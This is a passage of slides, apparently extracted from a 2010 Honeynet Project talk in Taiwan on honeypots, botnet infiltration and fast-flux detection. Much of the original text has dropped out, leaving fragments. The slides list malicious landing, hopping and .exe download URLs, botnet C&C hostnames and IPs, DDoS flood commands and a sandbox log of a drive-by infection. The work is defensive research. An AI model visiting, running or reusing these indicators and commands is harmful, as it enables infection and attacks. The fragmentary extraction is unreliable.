20100826-證交所-誘捕系統與殭屍網路(botnet and honeypot)

[email protected]

(Julia Yu-Chin Cheng)

2

Speaker -- Julia Cheng

: TWISC@NCKU Honeynet Project ( 2010 :

/ / / / /

Outline

The Honeynet Project

ANIMATED

SCENE 1

..

: u / u u u

: u MSN u Yahoo Massager! u QQ

: u u u

: u u u

2009

: h$p://www.bnext.com.tw/ar3cle/view/cid/127/id/13177

Malware) Ex:hijacking )

l

lWordPDFExcel l(Patch)

l

l l l( l

11

Vulnerable Web Server

1. 2.

Phishing Site

Exploit Code

(

l

l l

l

lMSNSkype

l(Phishing):

l Facebook Plurk

PDF

Delta Airlines

Paypal

20094DHL

DHL

2009-11-30

MSNSkype

( + + +

Step 1: (Blocked)

Step 2: MSN/ Skype Webcam

Skype

1

Email.

21

sysadmin [[email protected]]

2

MSNFacebookFacebook

22

Simple and Quickly:

Botnet Setup Tool Kits()

23

.

Hacking is easy and cheap. You will be a victim anytime and anywhere Hackers love your information, computer, network and your money Hacking market is very mature

24

Hacking Market

25

Seller : Bot

26

31

XR BOTS .25 EACH

700 DDoSeR bots for selling

32 153$ paypal ONLY

34

Sikandar's Private FUD Keylogger v1 Features:


ANIMATED

SCENE 2

37


The Honeynet Project is an organization dedicated to answering these questions. It studies the bad guys and shares the lessons learned. What specific threats do computer networks face from hackers? Who's perpetrating these threats and how? The group gathers information by deploying networks (called

honeynets) that are designed to be compromised.


The Honeynet Project is a non-profit, research organization improving the security of the Internet at no cost to the public by providing tools and information on cyber security threats.

Mission Statement:

To learn the tools, tactics, and motives of the blackhat community, and share the lessons learned.

nGoals :

n Awareness: To raise awareness of the threats that exist.

n Information: Aware, teach and inform about the threats.

n Research: To give organizations the capabilities to learn more on their own.

39

The Honeynet Project History

1999Mailing-List

2000Lance Spitzner Honeynet ProjectHoneynet Project

(2010.07)41Honeynet Project

The Honeynet Project History

41

1999 2000 2001 2002 2003 2004 2005 2006 2007 2008 2009

Member organized in Wargames

mailing list

Lance Spitzner officially become

Honeynet Project

Organize Research Alliance

Annual Workshop

Funded Google Code

Project

High-Interaction Honeywall CDROM ROO

Client Honeypot

Virtual Honeypot

41

GDH Project

Honeynet Project Organization

Characteristics: Not-profit (501c3) organization Trusted relationship for full members. Works virtually around the world.

42

Activities

KYE Papers Forensics Challenge Open Source Tools Development Global Distributed Honeynet (GDH II ) Google Summer Code (GSoC) Project Annual Closed Workshop

43

Annual Workshop

2009 Annual Workshop: 2009225228

70 (Closed Meeting)

: 15

R&D

Trusted Relationship

Hands-on Training Courses 44

We are here !

2007

2009

http://www.honeynet.org http://www.honeynet.org/project

ANIMATED

SCENE 3

xxxBotPHP Bot

1. RFI

Site A Host ProxyABot

Compromise Web A

Malicious CodePage

1.

IPEmail CPUMSN (Web , Smtp)

Malicious Web + RFI + Fast-Flux+ Phishing =

3322.org

2. Malware File Server

SMTP Server SMTP

Server

Malicious Web Site B2

Malicious Web Site B1

3322.org

3322.org Malicious Web Site B3

3322.org

Phishing Web Site C1

3322.org Phishing Web Site C2

3322.org

1.(Dynamic DNS): xxx.8866.org / xxxx.3322.org

2. :(setup)

3. : (Fast-Flux)

4.

53

Exploit Code

54 Exploit Code

(Cont.)

JavascriptExploit Code (Malicious Link)

55

http://v.6t65r.cn/01/

Drive-by-Download

Drive-by-Download

HTML (BrowserFlash PDF)

56

57

Malicious Link

Malicious Link

Malicious Link

Malicious Link

Obfuscated JavascriptObfuscated Javascript

MalwareMalwareMalware

Exploit Code

Landing Sites Hopping Site Download Site

JavaScripts

(

Landing sites

Client Honeypot

Thinking /

A lot of information to provide us : Firewall , IPS, Negios, System Logs, .. Authorized access, unauthorized connection, unusual

connections, abnormal behaviors,

However, what is critical information for network administrators ?

To Solve : finding a needle in a haystack Good Solution : Honeypot & Honeynet

59

(Honeypot)

60

General Purpose : Designed operation systems, services or vulnerabilities

around your networks to be probed and hacked.

All data collected is of high value and unpolluted

What is Honeypot ? () Honeypot

:

Honeypot

: www.mtsc.com.tw/service11.htm

Honeyd

HIHAT

(Bot)

- Honeyd

Internet

Router

192.168.0.1Linux

192.168.0.2FreeBSD

192.168.0.3Windows

192.1683.0.4NetBSD

192.168.0.0Honeyd

LSASS Vulnerability

MS04-011

LSASS

MS04-011

LSASS

l MS04-011(CVE 2003-0533) : LSASRV.DLL

W32.Gaobot.AFC/ W32.Gaobot.AFJ W32.Gaobot.AFW

W32.Sasser

Exploit code ( Fire-and Forget)

All Malicious Payload (Compromise Machine) W32.Gaobot.AFC/

W32.Gaobot.AFJ/W32.Gaobot.AFW

W32.Sasser

Nepenthes

(Autonomously Spreading)

Low-Interaction Honeypot : http://nepenthes.carnivore.it : http://nepenthes.mwcollect.org Developer: Paul Baecher, Markus Koetter

Emulated Vulnerable Services

Vulnerability Vulnerabilityvuln-asn1 vuln-optix

vuln-bagle vuln-pnp

vuln-dameware vuln-sasserftpd

vuln-dcom vuln-upnp

vuln-msmq vuln-veritas

vuln-mssql vuln-wins

vuln-mydoom vuln-msdtc

vuln-netbiosname vuln-ftpd

vuln-netdde vuln-sub7

vuln-kuang2 vuln-iis

vuln-lsass

Nepenthes Process

:

Nepenthes

- Nepenthes

69

Remote File Inclusion (Cont.)

Remote File Inclusion (RFI)

/RFI (Web Server)

70

Step 1: Try to Inject (Testing Code A) into target webpage Injec

t OK

Step 2: if OK, hackers can inject (Executable Code A ) to control host B

Step 3: Exploit this host and get root access authority

A: RFI attack site B: Target Site

(Remote)

71

http://milw0rm.org/exploits/ Step 1: RFI

Step 2: GoogleRFI ScannerRFI

Step 3: Inject APHP CodeTarget BRFIB

RFI Site A (Drop Site) Target B

PHP Code

Step 4: BRFITarget BBotBotnet

exploitscanner

72

RFI: HIHAT (Web Honeypot)

RFI Dropsite (RFI ScriptsWeb Server)

Web Honeypot -- HIHAT RFI Drop Site

73

Remote File Inclusion :

Why hackers loves vulnerable web server ? (Web Server ) (99% is online service)

74

(Honeynet)

: How can we collect more information and defend

against enemy, when we dont even know who the enemy is? ?

Honeypot

Honeynet

80

(Honeynet) (Cont.)

: :

: Honeypot

81

(Honeynet) (Cont.)

:

Honeynetriskvulnerabilities

82

Honeywall CDROM ROO

Honeynet ProjectHoneynetHoneynet

https://projects.honeynet.org/honeywall/

83

Honeynet

router

Host 1 Host N

...

Server 1 Server N

Honey Host 1Honey Host N

...

Management Host

eth1eth0

eth2HoneyWall

HoneyNet

...

84

Honeywall CDROM ROO

(Data Capture): Firewall LogSnortSebek

INTERNET

Honeywall

Sendmail Mail Server

Oracle DataBaseServer

DNS Server

MS-SQL DataBase Server

Apache WebServer

Honeynet

85

Honeywall CDROM ROO (Cont.)

(Data Capture):

(Data Control): honeypot

(Data Analysis):

Client Honeypot

Client Honeypot 2005Browser Exploits Client-Side Attacks : Client Honeypot is an active security devices in search of malicious servers that attack clients.

(Browser)

90

Client-Side Attack (Cont.) 1. Exploit Obfuscation ( encoding, dynamical content with Javascript, functions)

2. Redirect

window.open() window.location.href()

Drive-by-do

wnload

3. Exploit Code

Browser

Client-Side Attack (Cont.)

Client-Side Attack: bot Proxy spywarekeylogger Browser Helper Objects (BHOs)

Capture-HPC

n:Client honeypot is an active security devices/application in search of malicious servers that attack clients.

nServerServer(Benign)(Malicious)

n Capture-HPCClient HoneypotMalicious Web servers (Client-Side Attacks)

93

Client-Side Attack

JavaScript Mozilla Firefoxnoscripts

Java, Java Scripts

Honeypot

Honeynet

Client Honeypot

Malware Honeypot

GDH 2

l 1998 ~ lHoneyd, VoIP Pot, SpamPot, WirelessPot, Google Hack Pot, HIHAT l Service

l 2002 ~ lHoneywall CD-ROM , HoneyStick l

l 2005 ~ lHoneyC , Capture-HPC, HoneySpider, HoneyClient l

l 2006 ~ lNepenthes, Honeytrap l

l 2004 ~ lGDH1, GDH2 l Global Distributed Honeypot

Network

Connection

Web App.

Malware

Client-Side

Behavior

PCAP file

lCapture-BAT: Win32 Operation System Behavior Analysis Tool

lHoneysnap: Used for extracting and analyzing data

DNS lTracker: Used to find domains resolving, track hostname IP

EXE file lPehunter: grabs Windows executables off the network

lHoneymole: Setup Honeyfarm multiple sensors that redirect traffic to a centralized collection of honeypots.

lHoneywall CD ROM: Create a network architecture for capturing attacks

lHoneystick: It includes both the Honeywall and honeypots from a single, portable device

lHoneyd: Low-interaction used for capturing attacker activity lHoneytrap: Capture Novel attacks against network services

lGoogle Hack Honeypot : lHIHAT: transfer PHP application to Honeypot

lNepenthes: emulate known vulnerabilities to download malware

lHoneyC: Low interaction Client Honeypot lCapture-HPC: High-Interaction Client Honeypot

/

1. 2. IP / Physical Device/ 3. / / 4. 5.

97

HonEeeBox Rapid Deployment of Many Distributed Low Interaction Malware Collectors

Start project immediately (June 2009) Deploy widely and internationally (130+)

/ Firewall / IPS

105

ANIMATED

SCENE 3

Botnet Infrastructure

2. Setup Botnet C&C Server and

fast-flux xxxx.asia xxxx.asia xxxx.asia xxxx.asia xxxx.asia

1.Register Domain

xxxx.asia

Botnet Developer

3. Infected Bot

Controlled

4. Sell botnets 5.Control

botnets

6. Criminal Activities inside Botnets

YouTube ddos exploits

downlaod

Phishing Sites Click Information

Stealer DDOS Exploits /

New malware

SSH Brute

Flooding (new target)

Idea: 1.Monitoring inside the botnets 2.Collect pcap-traffic and command 3. Analyze and incident Reporting

Idea of Inside the Botnets

2. Setup Botnet C&C Server and

fast-flux xxxx.asia xxxx.asia xxxx.asia xxxx.asia xxxx.asia

1.Register Domain

xxxx.asia

Botnet Developer

3. Infected Bot

Controlled

4. Sell botnets 5.Control

botnets

6. Criminal Activities inside Botnets

YouTube ddos exploits

downlaod

Phishing Sites Click Information

Stealer DDOS Exploits /

New malware

SSH Brute

Flooding (new target)

Feedback Pcap

Bot IP

command

Idea: 1.Monitoring inside the botnets 2.Collect pcap-traffic and command 3. Analyze and incident Reporting

Fast-Flux Domain Detection

110

Fast-Flux Domain Detection (Cont.)

Fast-Flux : Fast-FluxContent Distributed Networks Botnetbotbotnet servic

eFast-FluxBotnetBotmaster

111

Fast-Flux Domain Detection A Hierarchical FF Detection Method:

Flux-score: Thorsten Holz, et. al., Measuring and Detecting Fast-Flux Service Networks, in Proceedings of the 15th Network & Distributed System Security Symposium (NDSS), 2008.

Phase 1: (Detect the FF domain and CDNs) Use different behavior conditions of FF to detect FF domain If it satisfies more than 4 conditions, it may be a ambiguous domain

which may be FF or the domain using CDNs

Phase 2: (Detect the FF domain exactly) Use Flux-score to further detect the FF domain from the ambiguous

domain


CDNA record ASN

114


A recordASN IPB Class

115

Inside the botnets : Methodology

2. Sample Analysis

Sample analysis to extract C&C information (IP, nickname, passwd, channel, command)

Analysis Tools: 1. CWSandbox / Anubis 2. VirusTotal 3. Libemu: Shellcode 4. Pkaii: PHP Analyzer

3. Infiltration Send the bot to join C&C server

Collect command, traffic and activities insides C&C

Monitoring Tools: 1. rishi: bot traffic monitor 2. infiltrator: 3. Xchat + vmware

1. Collection

Honeypot Technology 1. Malware collect HP 2. Malicious RFI HP 3. Malicious Web HP

Honeypot Tools : 1. Nepenthes 2. mwcollectd 3. Glastof / HIHAT 4. CaptureHPC 5. PhoneyC

Inside the botnets : Methodology (Cont.)

4. Feedback

Collect network pcap files Feedback information to IRC server (command, botIP, attacked targets)

Feedback Tools: 1. Scripts by myself 2. IRC server 3. weechat

5. Analysis

Data analysis using search engine tool

Data Visualization for pcap traffic analysis

Analysis Tools: 1. tshark 2. chaosreader 3. Splunk free version 4. Picviz

6. Reporting

Share data with trusted organizations

Ticket System: 1. OTRS2 (npt ready)

1. Collection : (Cont.)

Using HONEYPOT technology to collect attacking data and malicious samples

Why we use honeypot on data collection? Objective: Get infected hosts and capture malicious content Infected host with vulnerabilities may probe and attack honeypot with

the same vulnerability emulated.

Honeypot


Honeypot Design v.s Purpose ROO Honeywell (Collect attacking traffic and grab novel zero-day attacks ) Malware honeypot (Emulate windows vulnerabilities to collect malwares ) Client honeypot (Emulate browser behavior to detect malicious web content) RFI honeypot (Emulate vulnerable web applications to collect RFI attacks

Honeypot Deployment: ROO Honeywall and High-Interaction winxp Honeypots Malware honeypot (3) : Nepenthes / Dionaea / mwcollectd Client honeypot (3): capture-hpc / PhoneyC RFI honeypot (3): Glastof


Malware Honeypot (Nepenthes, Dionaea, mwcollectd): Honeypot Malicious Web Page (Capture-HPC, Phoneyc):

RFI Compromised Web (RFI Scripts Detection):

(Scripts)HTTP Botnet (RFI bot) Web Honeypotweb application vulnerabilitiesPHP Bot

Others: URL LinkPhishing

120

1. Collection : Nepenthes / Dionaea / mwcollecd

Botnet(Botnet C&C Server C&C Server

(Autonomously Spreading)

Nepenthes () / Dionaea () mwcollectd (Dionaea + honey trap )

Nepenthes: http://nepenthes.mwcollect.org Dionaea: http://dionaea.carnivore.it/ mwcollectd: http://code.mwcollect.org/projects/show/mwcollectd

1. Collection :

(


( MD5


1: Infected Hosts ( ) 2:

3:

1. Collection :

(Malicious Javascripts and Shellcode) Capture-HPC(Browser)(Malicious Web)

125


Capture-HPC

1

N

(URL

)

(URL)

. . .

1. Collection :

Landing Sites: http://www.bit361.com/ http://www.bit361.com/bbs

Hopping Sites: http://%77%2E%6A%73%67%75%61%6E%67%6A%69%2E%63%6E http://%77%2E%6A%73%67%75%61%6E%67%6A%69%2E%63%6E http://w.jsguangji.cn/03.htm http://w.jsguangji.cn/456.htm http://w.jsguangji.cn/1.jpg http://w.jsguangji.cn/2.jpg http://w.jsguangji.cn/dex.html http://w.jsguangji.cn/click.js http://js.tongji.linezing.com/1209024/tongji.js

Download Sites: http://w.taogu.org.cn/a.exe http://w.taogu.org.cn/b.exe http://w.taogu.org.cn/c.exe http://w.taogu.org.cn/d.exe

(Cont.)

Capture-HPC "registry","5/8/2009 18:17:38.333","C:\Program Files\Internet Explorer\IEXPLORE.EXE","SetValueKey","HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.js\OpenWithProgids\JSFile","-1"

"registry","5/8/2009 18:17:38.333","C:\Program Files\Internet Explorer\IEXPLORE.EXE","SetValueKey","HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.js\OpenWithProgids\JSFile","-1" "registry","5/8/2009 18:17:38.521","C:\Program Files\Internet Explorer\IEXPLORE.EXE","SetValueKey","HKCU\Software\Microsoft\Internet Explorer\Main\NotifyDownloadComplete","-1"

"process","5/8/2009 18:17:39.568","C:\Program Files\Internet Explorer\IEXPLORE.EXE","created","1624","C:\WINDOWS\system32\wscript.exe"

registry: SetValueKey 1340 C:\Program Files\Internet Explorer\IEXPLORE.EXE -> -1 HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.js\OpenWithProgids\JSFile registry: SetValueKey 1340 C:\Program Files\Internet Explorer\IEXPLORE.EXE -> -1 HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\ registry: SetValueKey 1340 C:\Program Files\Internet Explorer\IEXPLORE.EXE -> -1 HKCU\Software\Microsoft\Internet Explorer\Main\NotifyDownloadComplete process: created 1340 C:\Program Files\Internet Explorer\IEXPLORE.EXE -> C:\WINDOWS\system32\wscript.exe 3072 process: terminated 1340 C:\Program Files\Internet Explorer\IEXPLORE.EXE -> C:\WINDOWS\system32\wscript.exe 3072 process: created 1340 C:\Program Files\Internet Explorer\IEXPLORE.EXE -> C:\WINDOWS\system32\cmd.exe 3892 process: created 3892 C:\WINDOWS\system32\cmd.exe -> C:\WINDOWS\system32\cmd.exe 3016 process: created 3016 C:\WINDOWS\system32\cmd.exe -> C:\Documents and Settings\HPC\Local Settings\Temporary Internet Files\Content.IE5\8Y7MSOWW\alg3[1].exe 2192 registry: SetValueKey 784 C:\WINDOWS\system32\notepad.exe -> -1 HKCU\Software\Microsoft\Notepad\lfEscapement

JScripthttp://w.jsguangji.cn/03.htm

PhonecyCJavascripts Shllcode

PhoneyC Obfustrated JavascriptsShellcode

Shellcode

Heap spayBuffer Overflow

util.printf function triggered shellcode

131

Shellcode

Heap spay

util.printf function triggered shellcode

132

1. Collection : RFI Introduction

Remote File Inclusion (RFI)

/RFI (Web Server) Why hackers loves vulnerable web server ?

(Web Server ) (99% is online service)

133

1. Collection: RFI Scripts

RFI Scripts

1. Collection: RFI Scripts (Cont.)

RFI Scripts

1. Collection: RFI Scripts (Cont.)

RFI Scripts

( Exploit Codes )

Honeynet (Nepenthes): Honeypot

Malicious Web Page (Capture-HPC):

Compromised Web(RFI Detection): (Scripts)HTTP Botnet (RFI bot)

Others: URL LinkPhishing

137

2. Sample Analysis

Malware DB

Anti-Virus

Behavior Analysis

Static Analysis

Sandbox Real-Testbed

Sample Profiling

Profile : n Activities on OS : Registry, Process, File n Connection on Network: Propagation, Remote Controller n Signature Generation

2. Sample Analysis: Binary Samples using CWsandbox and Anubis

1. Network Activity to get C&C Information 2. Setup Virtual Lab and execute samples

for getting C&C information

Virus Total : http://www.virustotal.com/

Tool Analysis

Binary Analysis (Static): IDA Pro, OllyDBG IDA Pro: http://www.hex-rays.com/idapro/ OllDbg: http://www.ollydbg.de/

SysAnalyzer : automated malcode run time analysis application http://labs.idefense.com/software/malcode.php

Malcode Analysis Pack: http://labs.idefense.com/software/malcode.php#more_malcode

+analysis+pack

Honeynet (Nepenthes)

l() l ( Attack Log)

l l IRC C&C Server l

Malicious Web

(Capture-HPC)

l () l ( Log) l ( )

lMalware File Server ( ) l() lIRC C&C & HTTP C&C Server l

RFI Detection

lScripts (Scripts) l l lRFI Bot lC&C Server

Others l l143

2. Sample Analysis: RFI Scripts Analysis using PHP analyzer

PHP analysis using function hooking to get C&C Information

C&C information Analysis in RFI Scripts

3. Infiltration & Feedback

Binary Samples

Send the bot to join C&C server Collect command, traffic and activities insides C&C

Rishi

PHP execute RFI Samples

Winxp wireshark

xchat C&C Samples

Snort-Inline

C&C Servers

Activities collecting and analzing (No execute)

Switch

Virtual Machine

IRC server Pool

Feedback

Data-Feed

(Execute RFIScripts)

(Execute Samples)

3. Infiltration ( Cont.)

Live C&C ServerBotC&C ServerC&C Server

C&C Observation

4. Feedback :

C&C Server

5. Analysis:

1. Malware Samples Statistics 2. Attacking Statistics 3. Infected hosts (By Honeynet) 4. C&C Server information (Time, IP, port, account, ASN) (By Sample

Analysis) 5. Real Bots Connection (Inside the Botnets) 6. Botnet Activities (Insides the Botnets) 7. Attacked Targets (Insides the Botnets) 8. Command Controllers (Insides the Botnets)

1. (by Honeypot) ( Unique Samples: 23170 ) 2009/01~ 2009/12 : 16813 Collect malware binaries (50+), malicious PDF, malicious documents and RFI scripts (php bot, perl bot) (5+) everyday

3. Infected Hosts 467736 (2010/05/05 Update)

Taiwan (1264)

27%

China (965) 21%

Russian (373) 8%

Japan (349) 7%

Malaysia (227) 5%

Unite States (468) 10%

Canada (132) 3%

Romania(110) 2%

Korea(119) 3%

French(98) 2% Others(336) 7%

German(236) 5%

Taiwan (1264)

China (965)

Russian (373)

Japan (349)

Malaysia (227)

Unite States (468)

Canada (132)

Romania(110)

Korea(119)

French(98)

Others(336)

German(236)

Botnet

rep3le.locean-indien.com IRC (6667 TCP) France

symantec.loves.the.cock.pheer.biz IRC (18067 TCP) US

getsome.minilauncher.net IRC (62567TCP) CN

n0n0.d0d0n0.info IRC (8585 TCP) US

213.202.205.171 IRC (6667 TCP) DE

online.ircstyle.net IRC (6667 TCP) Netherlands

manz.urshell.com IRC (7000 TCP) US

123.dragonbreath.ru IRC (3195 TCP) US, RU KR (Fast-Flux)

camelot.blacknight.ie WWW(80) MailServer(25) Ireland

avgw.enternet.hu SMTP (25) US

Web2.denirulz.com www (81 TCP) Netherlands

capdr.com www (80 TCP) DE h$p://capdr.com/feed/

xx.nadnadzz.info IRC (10324 TCP) US (X)

Priv.gigaservice.it IRC (55003 TCP) UE, DE CN (Fast-Flux)

nhg1.cjb.net IRC (4244 TCP) RU

shops.vaiosys.com IRC (1234 TCP) US, CN

xx.ka3ek.com IRC (8080 TCP) CN, MY, US (Fast-Flux)

botz.noretards.com IRC (65146 TCP) FR

Ganbang.my3jn.org IRC (43000 TCP) US

Scan.kizlarevi.net IRC (4646 TCP) DE

Wmim.solu3onofmsn.org IRC (1234 TCP) US

Fix.drshells.com IRC (5555 TCP) PORTUGAL

60.10.179.100 IRC (8680 TCP) CN

More than 100 bots in the C & C Server

4. Live C&C Server Statistics:

45 live C&C Servers (Testing on June 30th)C&C Servers300Bots

US (8) 18%

JP (6) 13%

CN (7) 16%

RU (4) 9%

DE (4) 9%

FR (2) 4%

NL (2) 4%

MY (4) 9%

CA (3) 7%

Others (5) 11%

US (8)

JP (6)

CN (7)

RU (4)

DE (4)

FR (2)

NL (2)

MY (4)

CA (3)

Others (5)

4. Live C&C Server ( 2010/06/30 update)

v v v v v v v v

5. Real Bots Connection to C&C Server

2010/01/01 ~2010/06/30 40~78 C&C Servers (HTTP, IRC) Bots 60

14024

11095

26037

24165

5. Real Bots Inside the Botnet

US:15.69%

6. Botnet Activities Inside the Botnet:

DDOS_CMD: 57223 flood http blog.stsc.co.kr/1/1024518222.gif flood http 81.222.236.97/s88.exe flood udp CardServ2.com ddos_start tcp www.ddbp.ru 80 Dd1 http://www.azncommunity.net/ http_start http://nalog-pravo.net/index.php?article=3 flood udp sat-navi.net flood udp vipshara.dyndns.tv

6. Botnet Activities Inside the Botnet: (Cont.)

SCAN_CMD:5926 Scan Right Reserved Type: @karl For My List Of: 90,523 Files Slots: 0/2 Queued: 3

Speed: 52,525cps Next: 0m Served: 1,428,774 List: Jun 4th Search

SCAN_STATUS: 532 scan_source='323605A3.645CFD8A.4BB43273.IP', scan_target='76.x.x.x scan_source='Konvics-D0C34FD9.fbx.proxad.net', scan_target='76.x.x.x scan_source='Konvics-30B31C44.artem-catv.ru', scan_target='76.x.x.x',

6. Botnet Activities Inside the Botnet: (Cont.)

EXPLOIT_STATUS:2125 exploit_source='5AA7BDF5.F38BEC2.7DB8B3C.IP', exploit_target='76.246.253.206

7. Botnet Controllers Inside the Botnets

8 Infected Hosts and Real Bots in Taiwan

1264 Infected hosts in Taiwan to attack honeypots: Hinet : 867 TANET: 261 Others: 136 221 bots in Taiwan to join C&C Servers :

Hinet : 142 TANET: 47 Others : 32

Antivirus

35

2010/03/01 ~ 2010/03/30

Observation 1:

W32.Virut65 Worm.Allaple21 Trojan.IRCBot: 39 Trojan.Spybot: 18 Trojan.Zbot : 11 Trojan.MyBot: 24

Observation 2:

166 153$ paypal ONLY

700 DDoSeR bots for selling

Observation 3: Conflicker Samples

Malware Honeypot Conflicker (W32/Conficker!Generic ) 2010/04 : 68 2010/05 : 143 2010/06 : 82

17:00 ~19:00 Conflicker

http://datalossdb.org/statistics The Open Security Foundation's DataLossDB gathers information about events involving the loss, theft, or exposure of personally identifiable information (PII).

CCN : Credit Card Numbers SSN: Social Security Numbers NAA: Name and Address MISC: Miscellaneous ACC: Account information (Financial) DOB: Date of Birth

CSI70%

ICM39%52%86%

2010427

IT

http://www.microsoft.com/taiwan/security/privacy/

3:

17:

10:

1115:

11234:

(TrueCrypt+KeePass)

/

[email protected]

20100826-證交所-誘捕系統與殭屍網路(botnet and honeypot)

Presentations & Public Speaking